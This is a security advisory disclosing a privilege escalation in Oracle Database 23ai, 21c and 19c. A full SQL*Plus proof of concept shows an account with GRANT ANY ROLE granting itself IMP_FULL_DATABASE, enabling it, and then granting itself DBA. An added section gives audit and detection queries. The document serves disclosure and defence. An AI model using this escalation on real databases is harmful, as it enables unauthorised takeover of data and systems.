📄 Oracle 23ai / 21c / 19c Privilege Escalation

🗓️ 08 Jul 2025 00:00:00 | Reported by Emad Al-Mousa | Type: packetstorm | 🔗 packetstorm.news

Oracle database privilege escalation from GRANT ANY ROLE to DBA on 23ai, 21c, and 19c.

Title: Oracle 23ai Privilege Escalation From GRANT ANY ROLE To DBA Role
    Vendor:                   Oracle
    Product:                  Oracle database system
    Affected Version(s):       23ai, 21c, 19c
    Risk Level:                Medium
    Author of Advisory:        Emad Al-Mousa
    
    
    <Overview>:
    
    Privilege escalation is one of the most common techniques attackers use to take over critical systems, and database systems in particular must be protected against
    such attacks for the sake of data security. The exploit presented here highlights a security design flaw that system administrators and DBAs should be aware of.
    
    
    *****************************************************************************************************************************************
    
    <Exploit Summary Details>:
    
    A database account that has been granted the system privilege "GRANT ANY ROLE" can be used to escalate to the "DBA" role.
    
    *****************************************************************************************************************************************
    
    <Proof of Concept (PoC)>:
    
    
    I will connect as the SYS user and create a local database account called "tom" in the pluggable database FREEPDB1, as shown below:
    
    sqlplus / as sysdba
    
    SQL> alter session set container=FREEPDB1;
    
    Session altered.
    
    SQL> create user tom identified by tom123;
    
    User created.
    
    SQL> grant create session to tom;
    
    Grant succeeded.
    
    SQL> grant grant any role to tom;
    
    Grant succeeded.
    
    SQL> alter user tom default role all;
    
    SQL> exit;
    
    Next, I will connect directly to the database as the tom account using sqlplus:
    
    
    sqlplus "tom/tom123"@FREEPDB1
    
    Attempting to grant the DBA role to myself does not work, as expected (it is blocked to prevent an escalation attempt):
    
    SQL> grant dba to tom;
    grant dba to tom
    *
    ERROR at line 1:
    ORA-01031: insufficient privileges
    
    
    Attempting to grant the DBA role to another existing account, "hr", also fails:
    
    SQL> grant dba to hr;
    grant dba to hr
    *
    ERROR at line 1:
    ORA-01031: insufficient privileges
    
    
    The account is limited in power, as shown below: it can't create another database account called "tom2" and it can't view any database table:
    
    
    SQL> show user
    USER is "TOM"
    SQL>
    SQL> create user tom2 identified by tom123;
    create user tom2 identified by tom123
    *
    ERROR at line 1:
    ORA-01031: insufficient privileges
    Help: https://docs.oracle.com/error-help/db/ora-01031/
    
    
    SQL> select * from HR.DEPT;
    select * from HR.DEPT
                     *
    ERROR at line 1:
    ORA-00942: table or view "HR"."DEPT" does not exist
    Help: https://docs.oracle.com/error-help/db/ora-00942/
    
    The account can grant low-level built-in roles, such as the "resource" role, to other database accounts (which is what it is designed to do):
    
    SQL> show user
    USER is "TOM"
    SQL>
    SQL> grant resource to hr_app;
    
    Grant succeeded.
    
    
    The security weakness is that the account can escalate to the DBA role: it grants itself the IMP_FULL_DATABASE role, enables it with SET ROLE, and then grants DBA, as shown below:
    
    
    SQL> grant IMP_FULL_DATABASE to tom;
    
    Grant succeeded.
    
    SQL> set role all;
    
    Role set.
    
    SQL> grant dba to tom;
    
    Grant succeeded.
    
    
    Now account TOM has been elevated to the DBA role successfully!
    
    *****************************************************************************************************************************************
    
    <Remarks & Conclusion>:
    
    A database account with "GRANT ANY ROLE" should only have the power to grant roles to "other" accounts. The simple scenario above shows that if such an account is compromised, it can easily be elevated to the "DBA" role.
    
    Make sure that the passwords of accounts holding high system privileges in your database systems are complex, long, and protected. And, of course, security auditing will greatly help in detecting privilege escalation attempts in your landscape.
    
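As an added example (not part of the original advisory), the following SQL shows the inventory and auditing checks a DBA can use to find and detect this path: a listing of accounts that hold GRANT ANY ROLE or GRANT ANY PRIVILEGE, a listing of who already holds DBA or IMP_FULL_DATABASE, a unified audit policy (Oracle 12c and later) that records every exercise of those two system privileges, and a query over UNIFIED_AUDIT_TRAIL that flags grants of DBA or IMP_FULL_DATABASE. The policy name priv_grant_pol is an assumed name; the policy only captures statements that use the audited privileges, so the `set role all` step of the PoC is not recorded by it.

```sql
-- Added example (not from the advisory): inventory and audit checks for the
-- GRANT ANY ROLE -> IMP_FULL_DATABASE -> DBA escalation path.
-- Run as a privileged administrator (SYS or an account with AUDIT_ADMIN)
-- inside the pluggable database in question, e.g. FREEPDB1 from the PoC.
-- The policy name priv_grant_pol is an assumption.

-- 1. Who can grant roles or privileges at all? These accounts need the same
--    protection (strong passwords, monitoring) as DBA accounts.
SELECT grantee, privilege, admin_option
  FROM dba_sys_privs
 WHERE privilege IN ('GRANT ANY ROLE', 'GRANT ANY PRIVILEGE')
 ORDER BY grantee, privilege;

-- 2. Who already holds the two roles used in the escalation? Any account
--    that is not a known administrator is worth a closer look.
SELECT grantee, granted_role, admin_option, default_role
  FROM dba_role_privs
 WHERE granted_role IN ('DBA', 'IMP_FULL_DATABASE')
 ORDER BY granted_role, grantee;

-- 3. Unified audit policy: record every statement that exercises the
--    GRANT ANY ROLE or GRANT ANY PRIVILEGE system privilege, for all users.
CREATE AUDIT POLICY priv_grant_pol
  PRIVILEGES GRANT ANY ROLE, GRANT ANY PRIVILEGE;

AUDIT POLICY priv_grant_pol;

-- 4. Detection query: grants of DBA or IMP_FULL_DATABASE captured by the
--    policy, with the user of the granting session. A row in which the
--    granting user is also the target of its own GRANT is the self-escalation
--    shown in the PoC.
SELECT event_timestamp,
       dbusername,
       action_name,
       system_privilege_used,
       sql_text
  FROM unified_audit_trail
 WHERE unified_audit_policies LIKE '%PRIV_GRANT_POL%'
   AND action_name LIKE 'GRANT%'
   AND REGEXP_LIKE(sql_text, '^\s*GRANT\s+(DBA|IMP_FULL_DATABASE)\s+TO\s+', 'i')
 ORDER BY event_timestamp;
```

Queries 1 and 2 are the baseline to run once and compare against on a schedule; query 4 is the one to feed into alerting, since in the PoC both the `grant IMP_FULL_DATABASE to tom` and the final `grant dba to tom` come from the same session and the same dbusername.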
    
    *****************************************************************************************************************************************
    References:
    https://databasesecurityninja.wordpress.com/2025/07/02/oracle-23ai-privilege-escalation-from-grant-any-role-to-dba-role/
    https://docs.oracle.com/en/database/oracle/oracle-database/23/dbseg/configuring-privilege-and-role-authorization.html#GUID-FEC9C8E4-B935-405B-8994-9AC5A71C6DD7
